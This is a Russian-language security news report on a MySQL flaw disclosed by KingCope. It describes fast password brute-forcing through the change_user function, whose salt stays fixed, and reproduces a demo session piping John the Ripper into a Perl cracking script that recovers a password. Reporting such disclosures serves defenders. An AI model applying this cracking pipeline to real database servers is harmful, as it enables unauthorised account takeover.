Хакер KingCope не удовлетворился почти десятком oday-уязвимостей MySQL, которые он опубликовал в субботу, и вчера добавил описание ещё одной: быстрый брутфорс в локальном или удалённом режиме, после аутентификации на сервере MySQL под непривилегированным пользователем.

Речь идёт о переборе паролей со скоростью около 5000 в секунду за счёт использования функции change_user. Эта функция в MySQL работает очень быстро после установки авторизованной сессии, в отличие от перебора паролей для неавторизованных пользователей по сети, когда приходится каждый раз соединяться с сервером.

Уязвимость заключается в том, что при брутфорсе с помощью команды change_user не меняется соль для хэша, а при удалённом подключении к серверу и брутфорсе соль меняется на каждую попытку соединения.

Демонстрационный скрипт

Пример сессии, с использованием программы для брутфорса John the Ripper:

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted

В письме с описанием бага KingCope также подшучивает над мейнтейнерами СУБД. Хакер говорит, что не нужно выпускать патч, ведь это наверняка незначительный баг и полностью документированная функция. Здесь KingCope намекает на слова Сергея Голубчика, который недавно назвал уязвимость с повышением привилегий в MySQL под Windows «документированной функцией UTF».



Оставить мнение